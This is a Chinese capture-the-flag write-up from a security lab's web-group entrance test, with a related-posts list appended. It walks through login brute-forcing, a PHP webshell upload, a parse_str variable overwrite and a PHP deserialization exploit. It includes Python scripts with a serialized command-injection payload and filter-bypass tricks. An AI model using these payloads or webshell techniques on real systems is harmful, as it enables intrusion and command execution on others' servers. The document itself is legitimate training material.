极光网安实验室web组考核WP
极光网安实验室web组入组考核
一、47.106.94.13:13334/ctf
打开连接后看到登陆页面,第一反应是SQL注入,试过几下之后才在源码中看到了hint
base64解密为“admin”,猜测为username,抓包扔进BP进行爆破,用BP自带的字典就拿到了密码
拿到了第一个flag并跳转到一个文件上传页面
抓包,传入PHP文件并修改文件类型发现上传成功,于是传入一句话webshell,连上蚁剑
在Look_here.txt中拿到第二个flag
第一题结束
二、47.103.117.169:22230
打开页面啥都没有,架起御剑扫描后台
扫出一个bak备份文件,下载之后查看源码
审计代码,发现存在有parse_str变量覆盖漏洞,直接构造url进行尝试
经过尝试发现如图url顺利拿到第一个flag
第一个flag到手
继续代码审计,这里很显然是利用反序列化漏洞
利用${IFS}绕过空格过滤,用双写绕过字符串过滤,这里一定要在PHP中将序列化的结果进行一次urlencode,原因如下:
用下面的代码进行试验
import requests
from urllib.parse import urlencode
from urllib.parse import unquote
url = "http://47.103.117.169:22230/index.php?first=is_me&a=xxx=I%26yyy=wanna%26zzz=flag"
data='O%3A4%3A%22come%22%3A2%3A%7Bs%3A11%3A%22%00come%00funcs%22%3Bs%3A6%3A%22danger%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A27%3A%22%60cat%24%7BIFS%7Dflaflag.phpg.php%60%22%3B%7D%7D'
data1={'come':unquote('O%3A4%3A%22come%22%3A2%3A%7Bs%3A11%3A%22%00come%00funcs%22%3Bs%3A6%3A%22danger%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A27%3A%22%60cat%24%7BIFS%7Dflaflag.phpg.php%60%22%3B%7D%7D')}
data2={'come':'O:4:"come":2:{s:11:"comefuncs";s:6:"danger";s:10:"comeargs";a:1:{i:0;s:27:"`cat${IFS}flaflag.phpg.php`";}}'}
print(data1)
print(data2)
print(data)
print(urlencode(data2))
#a=requests.post(url,data=data1)
#print(a.content)
这里可以看到,如果PHP中未进行urlencode,则造成了%00字符的丢失。而在PHP中进行urlencode之后再在PY中unquote的话,则保留了\x00,所以可以post成功。
那为什么会这样呢?
因为本题里的类成员为private,所以会在字符串中掺入%00,而%00较为特殊,就导致了如果不在php里进行urlencode就会缺失的情况。
附上成功提交的脚本
import requestsfrom urllib.parse import urlencodefrom urllib.parse import unquoteurl = "http://47.103.117.169:22230/index.php?first=is_me&a=xxx=I%26yyy=wanna%26zzz=flag"data1={'come':unquote('O%3A4%3A%22come%22%3A2%3A%7Bs%3A11%3A%22%00come%00funcs%22%3Bs%3A6%3A%22danger%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A27%3A%22%60cat%24%7BIFS%7Dflaflag.phpg.php%60%22%3B%7D%7D')}a=requests.post(url,data=data1)print(a.content)
OK!成功的成为了极光实验室的一名菜鸡。(要好好努力啊)
极光网安实验室web组考核WP相关推荐
- BurpSuite实战——合天网安实验室学习笔记
burpsuite是一款功能强大的用于攻击web应用程序的集成平台,通常在服务器和客户端之间充当一个双向代理,用于截获通信过程中的数据包,对于截获到的包可以人为的进行修改和重放. 此BurpSuite ...
- 【蓝桥杯Web】大一小白参与蓝桥杯模拟赛二期web组体会
目录 前言 一.相关比赛介绍 1.ACM国际大学生程序设计竞赛 2.蓝桥杯 3.GPLT团队程序设计天梯赛 4.leetcode周赛和双周赛 5.PAT 二.蓝桥杯 1.应该参加蓝桥杯吗? 2.如何进 ...
- 合天网安就业班_CTF挑战赛-合天网安实验室
[TOCCTF挑战赛-合天网安实验室逆向解析] CTF挑战赛-合天网安实验室sourl.cn 1.逆向100 修改后缀为.apk 安卓模拟器打开,发现要求输入Password 用Android逆向助 ...
- 合天网安实验室CTF-基础50-0x01
合天网安实验室CTF-基础50-0x01 最近无聊时准备刷点题,由简到难慢慢来吧 题目描述 真的不能再简单了! 相关附件 misc50.zip 题目链接 参考解题步骤 1.下载下来的压缩包解压 ...
- 合天网安实验室CTF-Web100-Give Me Flag
合天网安实验室CTF-Web100-Give Me Flag 题目描述 哎,不小心把代码弄乱惹 相关附件 web100.zip 题目链接 参考解题步骤 1.下载附件打开后是一段JavaScri ...
- 合天网安实验室CTF-Exp200-Come on,Exploit me!
合天网安实验室CTF-Exp200-Come on,Exploit me! 题目描述 Audrey Tang. ⊙.⊙ 我只能说到这儿了 相关附件 exp200 题目链接 参考解题步骤 1.下 ...
- 合天网安实验室CTF-Steg150-一段欢快的曲调
合天网安实验室CTF-Steg150-一段欢快的曲调 题目描述 滴滴 相关附件 stego100.wav 题目链接 参考解题步骤 1.下载的附件是一段wav格式的音频,打开听了一下,确实是欢快 ...
- 2022.4.9第十三届蓝桥杯web组省赛个人题解
2022第十三届蓝桥杯第一次开放了web组赛道,博主作为一名前端小白,参加了这次比赛.一共十个题目,目的均是实现特定的网页效果,考点包含三件套.jQuery和vue,这里简单的进行一下个人的题解记录. ...
- 视觉组考核——装甲板识别
视觉组考核--装甲板识别 识别Robomaster的装甲板的简易程序 算法分析 装甲板识别主要分这几步 图像处理->提取灯柱同时对灯柱进行筛选->灯条匹配->装甲板的筛选 1.图像处 ...
最新文章
- ubuntu中使用apt命令安装ipython失败解决方案
- MemoryStream类
- AAAI 2019 《LiveBot: Generating Live Video Comments Based on Visual and Textual Contexts》论文笔记
- linux查看并发量的命令
- 外卖匹配系统_“外卖智能算法”和大学生有啥关系?来自工科生的专业分析
- mybatisplus 强制制空 空覆盖原来的字符串
- (day 34 - 哈希表 or 双指针 )剑指 Offer 57. 和为s的两个数字
- 计算机博弈军旗程序,军棋机器人UCT算法及计算机博弈行为研究
- Android仿人人客户端(v5.7.1)——有关滑动式左侧菜单实现过程中网友的疑问解答
- “烧”不起原创欲减少成本投入,奈飞还能稳坐流媒体龙头宝座么?
- python期末考试是怎么考的_python期末考试复习
- react-redux中Connect方法
- 洛夏墨迹测验(Rorschach Inkblot Test)
- altium 旋转线段_几何画板旋转动画教程,这软件真牛!
- Statement接口的基本介绍和使用
- arduino自制cnc绘图仪_Arduino + 光驱改造数控绘图机
- elasticsearch 建立索引、增删改查 及简单查询和组合查询的学习笔记
- linux 查重脚本,Linux脚本学习必经之路:Shell脚本实例分享
- 超级详细的project2019专业版下载安装激活教程和激活码
- 股票买卖原则及方法之一